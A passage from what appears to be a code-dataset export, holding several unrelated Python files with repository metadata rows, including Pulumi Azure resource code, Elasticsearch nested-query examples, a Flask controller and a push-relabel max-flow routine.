mappings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TypePropertiesMappingArgs']]]]] = None,
operation_type: Optional[pulumi.Input['InstanceOperationType']] = None,
participant_property_references: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ParticipantPropertyReferenceArgs']]]]] = None,
reference_only: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
source_interaction_type: Optional[pulumi.Input[str]] = None,
target_profile_type: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
The link resource format.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] description: Localized descriptions for the Link.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] display_name: Localized display name for the Link.
:param pulumi.Input[str] hub_name: The name of the hub.
:param pulumi.Input[str] link_name: The name of the link.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TypePropertiesMappingArgs']]]] mappings: The set of properties mappings between the source and target Types.
:param pulumi.Input['InstanceOperationType'] operation_type: Determines whether this link is supposed to create or delete instances if Link is NOT Reference Only.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ParticipantPropertyReferenceArgs']]]] participant_property_references: The properties that represent the participating profile.
:param pulumi.Input[bool] reference_only: Indicating whether the link is reference only link. This flag is ignored if the Mappings are defined. If the mappings are not defined and it is set to true, links processing will not create or update profiles.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] source_interaction_type: Name of the source Interaction Type.
:param pulumi.Input[str] target_profile_type: Name of the target Profile Type.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: LinkArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
The link resource format.
:param str resource_name: The name of the resource.
:param LinkArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(LinkArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
display_name: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
hub_name: Optional[pulumi.Input[str]] = None,
link_name: Optional[pulumi.Input[str]] = None,
mappings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TypePropertiesMappingArgs']]]]] = None,
operation_type: Optional[pulumi.Input['InstanceOperationType']] = None,
participant_property_references: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ParticipantPropertyReferenceArgs']]]]] = None,
reference_only: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
source_interaction_type: Optional[pulumi.Input[str]] = None,
target_profile_type: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = LinkArgs.__new__(LinkArgs)
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
if hub_name is None and not opts.urn:
raise TypeError("Missing required property 'hub_name'")
__props__.__dict__["hub_name"] = hub_name
__props__.__dict__["link_name"] = link_name
__props__.__dict__["mappings"] = mappings
__props__.__dict__["operation_type"] = operation_type
if participant_property_references is None and not opts.urn:
raise TypeError("Missing required property 'participant_property_references'")
__props__.__dict__["participant_property_references"] = participant_property_references
__props__.__dict__["reference_only"] = reference_only
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if source_interaction_type is None and not opts.urn:
raise TypeError("Missing required property 'source_interaction_type'")
__props__.__dict__["source_interaction_type"] = source_interaction_type
if target_profile_type is None and not opts.urn:
raise TypeError("Missing required property 'target_profile_type'")
__props__.__dict__["target_profile_type"] = target_profile_type
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["tenant_id"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:customerinsights/v20170101:Link"), pulumi.Alias(type_="azure-native:customerinsights:Link"), pulumi.Alias(type_="azure-nextgen:customerinsights:Link"), pulumi.Alias(type_="azure-native:customerinsights/v20170426:Link"), pulumi.Alias(type_="azure-nextgen:customerinsights/v20170426:Link")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Link, __self__).__init__(
'azure-native:customerinsights/v20170101:Link',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Link':
"""
Get an existing Link resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = LinkArgs.__new__(LinkArgs)
__props__.__dict__["description"] = None
__props__.__dict__["display_name"] = None
__props__.__dict__["link_name"] = None
__props__.__dict__["mappings"] = None
__props__.__dict__["name"] = None
__props__.__dict__["operation_type"] = None
__props__.__dict__["participant_property_references"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["reference_only"] = None
__props__.__dict__["source_interaction_type"] = None
__props__.__dict__["target_profile_type"] = None
__props__.__dict__["tenant_id"] = None
__props__.__dict__["type"] = None
return Link(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Localized descriptions for the Link.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Localized display name for the Link.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="linkName")
def link_name(self) -> pulumi.Output[str]:
"""
The link name.
"""
return pulumi.get(self, "link_name")
@property
@pulumi.getter
def mappings(self) -> pulumi.Output[Optional[Sequence['outputs.TypePropertiesMappingResponse']]]:
"""
The set of properties mappings between the source and target Types.
"""
return pulumi.get(self, "mappings")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="operationType")
def operation_type(self) -> pulumi.Output[Optional[str]]:
"""
Determines whether this link is supposed to create or delete instances if Link is NOT Reference Only.
"""
return pulumi.get(self, "operation_type")
@property
@pulumi.getter(name="participantPropertyReferences")
def participant_property_references(self) -> pulumi.Output[Sequence['outputs.ParticipantPropertyReferenceResponse']]:
"""
The properties that represent the participating profile.
"""
return pulumi.get(self, "participant_property_references")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
Provisioning state.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="referenceOnly")
def reference_only(self) -> pulumi.Output[Optional[bool]]:
"""
Indicating whether the link is reference only link. This flag is ignored if the Mappings are defined. If the mappings are not defined and it is set to true, links processing will not create or update profiles.
"""
return pulumi.get(self, "reference_only")
@property
@pulumi.getter(name="sourceInteractionType")
def source_interaction_type(self) -> pulumi.Output[str]:
"""
Name of the source Interaction Type.
"""
return pulumi.get(self, "source_interaction_type")
@property
@pulumi.getter(name="targetProfileType")
def target_profile_type(self) -> pulumi.Output[str]:
"""
Name of the target Profile Type.
"""
return pulumi.get(self, "target_profile_type")
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> pulumi.Output[str]:
"""
The hub name.
"""
return pulumi.get(self, "tenant_id")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
| 46.975225 | 376 | 0.666443 | 2,350 | 20,857 | 5.637447 | 0.078723 | 0.089674 | 0.053895 | 0.03442 | 0.799139 | 0.715202 | 0.631341 | 0.567482 | 0.537591 | 0.481884 | 0 | 0.002055 | 0.230091 | 20,857 | 443 | 377 | 47.081264 | 0.822954 | 0.233399 | 0 | 0.402174 | 1 | 0 | 0.163188 | 0.08229 | 0 | 0 | 0 | 0 | 0 | 1 | 0.148551 | false | 0.003623 | 0.028986 | 0 | 0.275362 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
dfece35aa41f364b2c33910decca79059fefe080 | 144 | py | Python | backend/python3/practice/loop_while.py | cmdlhz/study_for_ver2 | 2e5110d0ce80e70a163a132c9c9cbb0cd9f4f134 | [
"MIT"
] | null | null | null | backend/python3/practice/loop_while.py | cmdlhz/study_for_ver2 | 2e5110d0ce80e70a163a132c9c9cbb0cd9f4f134 | [
"MIT"
] | null | null | null | backend/python3/practice/loop_while.py | cmdlhz/study_for_ver2 | 2e5110d0ce80e70a163a132c9c9cbb0cd9f4f134 | [
"MIT"
] | null | null | null | age = 10
num = 0
while num < age:
if num == 0:
num += 1
continue
if num % 2 == 0:
print(num)
if num > 4:
break
num += 1 | 12 | 18 | 0.472222 | 25 | 144 | 2.72 | 0.48 | 0.220588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 0.395833 | 144 | 12 | 19 | 12 | 0.678161 | 0 | 0 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.090909 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
5f097c38682586536a4136ac804db165e16d7bca | 9,630 | py | Python | _/elasticsearch-essentials-python-examples/chapter-6/relational_data_examples.py | paullewallencom/elasticsearch-978-1-7843-9101-0 | ff74cb7faafdf54c9d1ba828f74fea592898201f | [
"Apache-2.0"
] | null | null | null | _/elasticsearch-essentials-python-examples/chapter-6/relational_data_examples.py | paullewallencom/elasticsearch-978-1-7843-9101-0 | ff74cb7faafdf54c9d1ba828f74fea592898201f | [
"Apache-2.0"
] | null | null | null | _/elasticsearch-essentials-python-examples/chapter-6/relational_data_examples.py | paullewallencom/elasticsearch-978-1-7843-9101-0 | ff74cb7faafdf54c9d1ba828f74fea592898201f | [
"Apache-2.0"
] | null | null | null | __author__ = 'bharvi'
from elasticsearch import Elasticsearch
import json
#Creating Elasticsearch Client
es = Elasticsearch('localhost:9200')
def create_index_with_nested_mapping(index_name, doc_type):
'''
Function to create index with nested mapping
:param index_name: Name of the index to be created
:param doc_type: Name of document type to be created
'''
doc_mapping = {
"properties": {
"user": {
"type": "object",
"properties": {
"screen_name": {
"type": "string"
},
"followers_count": {
"type": "integer"
},
"created_at": {
"type": "date"
}
}
},
"tweets": {
"type": "nested",
"properties": {
"id": {
"type": "string"
},
"text": {
"type": "string"
},
"created_at": {
"type": "date"
}
}
}
}
}
body = dict()
mapping = dict()
mapping[doc_type] = doc_mapping
body['mappings'] = mapping
es.indices.create(index=index_name, body = body)
print 'index created successfully'
def index_nested_doc(index_name, doc_type):
document = {
"user": {
"screen_name": "d_bharvi",
"followers_count": "2000",
"created_at": "2012-06-05"
},
"tweets": [
{
"id": "121223221",
"text": "understanding nested relationships",
"created_at": "2015-09-05"
},
{
"id": "121223222",
"text": "NoSQL databases are awesome",
"created_at": "2015-06-05"
}
]
}
es.index(index=index_name, doc_type=doc_type, body=document, id=2333)
def find_nested_docs(index_name, doc_type, nested_field):
'''
Function for querying nested documents
:param index_name: Name of the index to be searched
:param doc_type: Name of document type to be searched
:param nested_field: path of the nested field ('tweets in our examples')
'''
query = {
"query": {
"nested": {
"path": nested_field,
"query": {
"bool": {
"must": [
{
"match": {
"tweets.text": "NoSQL"
}
},
{
"term": {
"tweets.created_at": "2015-09-05"
}
}
]
}
}
}
}
}
response = es.search(index=index_name, doc_type=doc_type, body=query)
for hit in response['hits']['hits']:
print json.dumps(hit.get('_source'))
def nested_aggregation(index_name, doc_type, nested_field):
'''
Function for performing nested aggregations
:param index_name: Name of the index to be searched
:param doc_type: Name of document type to be searched
:param nested_field: path of the nested field ('tweets in our examples')
'''
query = {
"aggs": {
"NESTED_DOCS": {
"nested": {
"path": nested_field
},"aggs": {
"TWEET_TIMELINE": {
"date_histogram": {
"field": "tweets.created_at",
"interval": "day"
}
}
}
}
}
}
response = es.search(index=index_name, doc_type=doc_type, body=query, search_type='count')
for bucket in response['aggregations']['NESTED_DOCS']['TWEET_TIMELINE']['buckets']:
print bucket['key'],bucket['key_as_string'], bucket['doc_count']
def reverse_nested_aggregation(index_name, doc_type, nested_field):
'''
Function for performing reverse nested aggregations
:param index_name: Name of the index to be searched
:param doc_type: Name of document type to be searched
:param nested_field: path of the nested field ('tweets in our examples')
'''
query = {
"aggs": {
"NESTED_DOCS": {
"nested": {
"path": nested_field
},
"aggs": {
"TWEET_TIMELINE": {
"date_histogram": {
"field": "tweets.created_at",
"interval": "day"
},
"aggs": {
"USERS": {
"reverse_nested": {},
"aggs": {
"UNIQUE_USERS": {
"cardinality": {
"field": "user.screen_name"
}
}
}
}
}
}
}
}
}
}
response = es.search(index=index_name, doc_type=doc_type, body=query, search_type='count')
for bucket in response['aggregations']['NESTED_DOCS']['TWEET_TIMELINE']['buckets']:
print bucket['key'],bucket['key_as_string'], bucket['doc_count']
print bucket['USERS']['UNIQUE_USERS']['value']
print bucket['USERS']['doc_count']
def index_nested_doc(index_name, doc_type):
document = {
"user": {
"screen_name": "d_bharvi",
"followers_count": "2000",
"created_at": "2012-06-05"
},
"tweets": [
{
"id": "121223221",
"text": "understanding nested relationships",
"created_at": "2015-09-05"
},
{
"id": "121223222",
"text": "NoSQL databases are awesome",
"created_at": "2015-06-05"
}
]
}
print es.index(index=index_name, doc_type=doc_type, body=document, id=2333)
def create_index_with_parent_child_mapping(index_name, parent_type, child_type):
'''
Function to create index with nested mapping
:param index_name: Name of the index to be created
:param parent_type: Name of parent type to be created
:param child_type: Name of child_type type to be created
'''
child_doc_mapping = {
"_parent": {
"type": parent_type
},
"properties": {
"text":{"type": "string"},
"created_at":{"type": "date"}
}
}
body = dict()
mapping = dict()
mapping[child_type] = child_doc_mapping
body['mappings'] = mapping
es.indices.create(index=index_name, body = body)
parent_doc_mapping = {
"properties": {
"screen_name":{"type": "string"},
"created_at":{"type": "date"}
}
}
body = dict()
mapping = dict()
# mapping[parent_type] = parent_doc_mapping
body['mappings'] = mapping
es.indices.put_mapping(index=index_name, doc_type=parent_type, body = parent_doc_mapping)
print 'index created successfully'
def index_parent_child_docs(index_name, parent_type, child_type):
'''
Function to index parent and child docs
:param index_name: Name of the index
:param parent_type: Name of parent type
:param child_type: Name of child_type type
'''
parent_doc = dict()
parent_doc['screen_name'] = 'd_bharvi'
parent_doc['followers_count"'] = 2000
parent_doc['create_at"'] = '2012-05-30'
child_doc = dict()
child_doc['text'] = 'learning parent-child concepts'
child_doc['created_at'] = '2015-10-30'
es.index(index=index_name, doc_type=parent_type, body=parent_doc, id='64995604')
es.index(index=index_name, doc_type=child_type, body=child_doc, id='2333', parent= '64995604')
def find_parent_by_child(index_name, parent_type, child_type):
'''
Example function for has_child query to return parent documents
:param index_name: Name of the index to be searched
:param parent_type: Name of parent type to be returned ('users in our examples')
:param child_type: Name of child type to be searched ('tweets in our examples')
'''
query = {
"query": {
"has_child": {
"type": child_type,
"query": {
"match": {
"text": "elasticsearch"
}
}
}
}
}
response = es.search(index=index_name, doc_type=parent_type, body=query)
for hit in response['hits']['hits']:
print json.dumps(hit.get('_source'))
def find_child_by_parent(index_name, parent_type, child_type):
'''
Example function for has_parent query to return child documents
:param index_name: Name of the index to be searched
:param parent_type: Name of parent type to be searched ('users in our examples')
:param child_type: Name of child type to be returned ('tweets in our examples')
'''
query = {
"query": {
"has_parent": {
"type": parent_type,
"query": {
"range": {
"followers_count": {
"gte": 200
}
}
}
}
}
}
response = es.search(index=index_name, doc_type=child_type, body=query)
for hit in response['hits']['hits']:
print json.dumps(hit.get('_source'))
if __name__ == "__main__":
create_index_with_nested_mapping('twitter_nested','users')
index_nested_doc('twitter_nested','users')
find_nested_docs('twitter_nested', 'users', 'tweets')
nested_aggregation('twitter_nested', 'users', 'tweets')
reverse_nested_aggregation('twitter_nested', 'users', 'tweets')
create_index_with_parent_child_mapping('twitter_parent_child','users', 'tweets')
index_parent_child_docs('twitter_parent_child','users', 'tweets')
find_parent_by_child('twitter_parent_child', 'users', 'tweets')
find_child_by_parent('twitter_parent_child', 'users', 'tweets')
| 30.766773 | 98 | 0.552648 | 1,048 | 9,630 | 4.83874 | 0.118321 | 0.053244 | 0.037862 | 0.050483 | 0.75843 | 0.722737 | 0.666535 | 0.632025 | 0.575823 | 0.564189 | 0 | 0.023744 | 0.322118 | 9,630 | 312 | 99 | 30.865385 | 0.753064 | 0.007373 | 0 | 0.408907 | 0 | 0 | 0.235627 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.008097 | null | null | 0.040486 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
5f15b99e042bd43771e58506cde68e2ce5189fb4 | 153 | py | Python | src/essentials/io/print.py | ozanyldzgithuboffical/OzzyPythonSeriesPack | 5ba98449d8ab744db98ae038dc7a137edbaaff5d | [
"MIT"
] | null | null | null | src/essentials/io/print.py | ozanyldzgithuboffical/OzzyPythonSeriesPack | 5ba98449d8ab744db98ae038dc7a137edbaaff5d | [
"MIT"
] | null | null | null | src/essentials/io/print.py | ozanyldzgithuboffical/OzzyPythonSeriesPack | 5ba98449d8ab744db98ae038dc7a137edbaaff5d | [
"MIT"
] | null | null | null | # @Author: Ozan YILDIZ@2022
# Simple printing operation
val = 12
if __name__ == '__main__':
#print operation
print("Boolean True (True)", val)
| 17 | 37 | 0.673203 | 19 | 153 | 5 | 0.789474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04918 | 0.202614 | 153 | 8 | 38 | 19.125 | 0.729508 | 0.431373 | 0 | 0 | 0 | 0 | 0.329268 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
5f1dd68567246b09750f7089819a42aeed2a93b5 | 1,727 | py | Python | src/controllers/thread.py | xoudini/tsoha | 39535ae851a4600089df2503961b6446e1f12253 | [
"Apache-2.0"
] | 1 | 2018-01-15T14:04:38.000Z | 2018-01-15T14:04:38.000Z | src/controllers/thread.py | xoudini/tsoha | 39535ae851a4600089df2503961b6446e1f12253 | [
"Apache-2.0"
] | 1 | 2018-01-13T20:30:15.000Z | 2018-01-14T16:18:26.000Z | src/controllers/thread.py | xoudini/tsoha | 39535ae851a4600089df2503961b6446e1f12253 | [
"Apache-2.0"
] | null | null | null | from flask import render_template
from typing import Dict, List
from src.models.thread import Thread
from src.models.tag import Tag
class ThreadController:
### View rendering.
@staticmethod
def view_for_threads():
threads = Thread.find_all()
return render_template('threads.html', title="Threads", threads=threads)
@staticmethod
def view_for_thread(uid: int, messages: Dict[str, str] = None):
thread = Thread.find_by_id(uid)
return render_template('thread.html', title="Thread", thread=thread, messages=messages)
@staticmethod
def view_for_new_thread(messages: Dict[str, str] = None):
tags = Tag.find_all()
return render_template('new_thread.html', title="New thread", tags=tags, messages=messages)
@staticmethod
def view_for_edit_thread(uid: int, messages: Dict[str, str] = None):
thread = Thread.find_by_id(uid)
tags = Tag.find_all()
return render_template('edit_thread.html', title="Edit thread", thread=thread, tags=tags, messages=messages)
### Database updates.
@staticmethod
def create(user_id: int, title: str, content: str, tag_ids: List[int]):
result = Thread.create(user_id, title, content, tag_ids)
return result
@staticmethod
def update(uid: int, title: str, tag_ids: List[int]):
result = Thread.update(uid, title, tag_ids)
return result
@staticmethod
def delete(uid: int):
Thread.delete(uid)
### Helper methods.
@staticmethod
def thread_exists(uid: int):
return Thread.find_by_id(uid) is not None
@staticmethod
def author_for_thread(uid: int):
return Thread.author_for_thread(uid)
| 28.783333 | 116 | 0.672843 | 224 | 1,727 | 5.022321 | 0.223214 | 0.12 | 0.067556 | 0.078222 | 0.435556 | 0.337778 | 0.211556 | 0.101333 | 0.101333 | 0.101333 | 0 | 0 | 0.219456 | 1,727 | 59 | 117 | 29.271186 | 0.83457 | 0.028373 | 0 | 0.384615 | 0 | 0 | 0.052758 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0 | 0.102564 | 0.051282 | 0.564103 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
a024701995b568e3c6e354e6a372130d13c65f5c | 948 | py | Python | src/Core/IssuerHandler.py | flexiooss/flexio-flow | 47491c7e5b49a02dc859028de0d486edc0014b26 | [
"Apache-2.0"
] | null | null | null | src/Core/IssuerHandler.py | flexiooss/flexio-flow | 47491c7e5b49a02dc859028de0d486edc0014b26 | [
"Apache-2.0"
] | 44 | 2019-04-05T06:08:15.000Z | 2021-09-13T19:37:49.000Z | src/Core/IssuerHandler.py | flexiooss/flexio-flow | 47491c7e5b49a02dc859028de0d486edc0014b26 | [
"Apache-2.0"
] | null | null | null | from typing import Optional
from Core.ConfigHandler import ConfigHandler
from FlexioFlow.Options import Options
from FlexioFlow.StateHandler import StateHandler
from VersionControlProvider.Issuer import Issuer
from VersionControlProvider.IssuerFactory import IssuerFactory
from VersionControlProvider.Issuers import Issuers
class IssuerHandler:
def __init__(self, state_handler: StateHandler, config_handler: ConfigHandler,options: Options):
self.state_handler: StateHandler = state_handler
self.config_handler: ConfigHandler = config_handler
self.options: Options = options
def issuer(self) -> Optional[Issuer]:
issuers: Issuers = Issuers.GITHUB
issuer = None
try:
issuer: Issuer = IssuerFactory.build(self.state_handler, self.config_handler, issuers,self.options)
except ValueError:
print('Can\'t get Issuer')
finally:
return issuer
| 35.111111 | 111 | 0.742616 | 98 | 948 | 7.061224 | 0.336735 | 0.069364 | 0.069364 | 0.080925 | 0.083815 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.198312 | 948 | 26 | 112 | 36.461538 | 0.910526 | 0 | 0 | 0 | 0 | 0 | 0.004219 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.333333 | 0 | 0.52381 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
a0268b071ea7f0de2f166e0ff7fd289453395a45 | 2,452 | py | Python | code/deprecated/push_relabel.py | campovski/bachelor | 36587a42bd95420fe030c5a903369c1b025c1ce0 | [
"MIT"
] | null | null | null | code/deprecated/push_relabel.py | campovski/bachelor | 36587a42bd95420fe030c5a903369c1b025c1ce0 | [
"MIT"
] | null | null | null | code/deprecated/push_relabel.py | campovski/bachelor | 36587a42bd95420fe030c5a903369c1b025c1ce0 | [
"MIT"
] | null | null | null | class Graph:
class Vertex:
def __init__(self, h, e):
self.h = h
self.e = e
class Edge:
def __init__(self, u, v, c, f):
self.u = u
self.v = v
self.c = c
self.f = f
def __init__(self, V):
self.vertices = [self.Vertex(0, 0) for _ in range(V)]
self.edges = []
def max_flow(self):
self.init_preflow()
while self.get_overflowing_vertex() != -1:
u = self.get_overflowing_vertex()
if not self.push(u):
self.relabel(u)
return self.vertices[len(self.vertices)-1].e
def init_preflow(self):
self.vertices[0].h = len(self.vertices)
for i in range(len(self.edges)):
if self.edges[i].u == 0:
self.edges[i].f = self.edges[i].c
self.vertices[self.edges[i].v].e = self.edges[i].f
#self.add_edge(self.edges[i].v, 0, 0, -self.edges[i].f)
self.update_reverse_edge(i, self.edges[i].f)
def push(self, u):
for i in range(len(self.edges)):
if self.edges[i].u == u and self.edges[i].f < self.edges[i].c\
and self.vertices[u].h > self.vertices[self.edges[i].v].h:
delta = min(self.vertices[u].e, self.edges[i].c - self.edges[i].f)
self.vertices[u].e -= delta
self.vertices[self.edges[i].v].e += delta
self.edges[i].f += delta
self.update_reverse_edge(i, delta)
return 1
return 0
def relabel(self, u):
min_height_adj = sys.maxint
for i in range(len(self.edges)):
if self.edges[i].u == u and self.edges[i].f < self.edges[i].c and \
self.vertices[self.edges[i].v].h < min_height_adj:
min_height_adj = self.vertices[self.edges[i].v].h
self.vertices[u].h = min_height_adj + 1;
def get_overflowing_vertex(self):
for u in range(1, len(self.vertices)-1):
if self.vertices[u].e > 0:
return u
return -1
def update_reverse_edge(self, i, delta):
for j in range(len(self.edges)):
if self.edges[i].u == self.edges[j].v and self.edges[i].v == self.edges[j].u:
self.edges[j].f -= delta
return
self.add_edge(self.edges[i].v, self.edges[i].u, 0, -delta)
def add_edge(self, u, v, c, f):
self.edges.append(self.Edge(u, v, c, f))
def populate_graph():
V = int(raw_input())
graph = Graph(V)
while True:
try:
u, v, c = raw_input().split()
graph.add_edge(int(u), int(v), int(c), 0)
except EOFError:
break
return graph
if __name__ == '__main__':
import sys
graph = populate_graph()
print "Maximum flow through given network is {0}.".format(graph.max_flow())
| 25.020408 | 80 | 0.62398 | 437 | 2,452 | 3.379863 | 0.148741 | 0.207177 | 0.169262 | 0.05958 | 0.369668 | 0.315504 | 0.268111 | 0.1652 | 0.150305 | 0.150305 | 0 | 0.009207 | 0.202692 | 2,452 | 97 | 81 | 25.278351 | 0.746292 | 0.022023 | 0 | 0.041096 | 0 | 0 | 0.020868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.013699 | null | null | 0.013699 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
a02e0a082de3fbb3c2ed2d36ddef397fafd72c56 | 317 | py | Python | Luke 03/03.py | Nilzone-/Knowit-Julekalender-2017 | 66ef8a651277e0fef7d9278f3f129410b5b98ee0 | [
"MIT"
] | null | null | null | Luke 03/03.py | Nilzone-/Knowit-Julekalender-2017 | 66ef8a651277e0fef7d9278f3f129410b5b98ee0 | [
"MIT"
] | null | null | null | Luke 03/03.py | Nilzone-/Knowit-Julekalender-2017 | 66ef8a651277e0fef7d9278f3f129410b5b98ee0 | [
"MIT"
] | null | null | null | from bitarray import bitarray
from PIL import Image
image = Image.open('knowit_03.png')
red, *_ = image.split()
bits = [x & 1 for x in red.tobytes()]
#byte_string, *_ = bitarray(bits, endian='little').tobytes().partition(b'\0')
#result = byte_string.decode('ascii')
print(bitarray(bits, endian='little').tobytes()) | 28.818182 | 77 | 0.706625 | 46 | 317 | 4.76087 | 0.608696 | 0.091324 | 0.164384 | 0.219178 | 0.283105 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014235 | 0.113565 | 317 | 11 | 78 | 28.818182 | 0.765125 | 0.353312 | 0 | 0 | 0 | 0 | 0.093137 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
a0335023fe1f244d748c1159f41b888a2ca0ca0a | 1,006 | py | Python | Statistics/Population_corelation_coefficient.py | rar9898/StatisticalCalculator | 34ffd7e9e60facd5cce7af3e43ceb244f741138b | [
"MIT"
] | null | null | null | Statistics/Population_corelation_coefficient.py | rar9898/StatisticalCalculator | 34ffd7e9e60facd5cce7af3e43ceb244f741138b | [
"MIT"
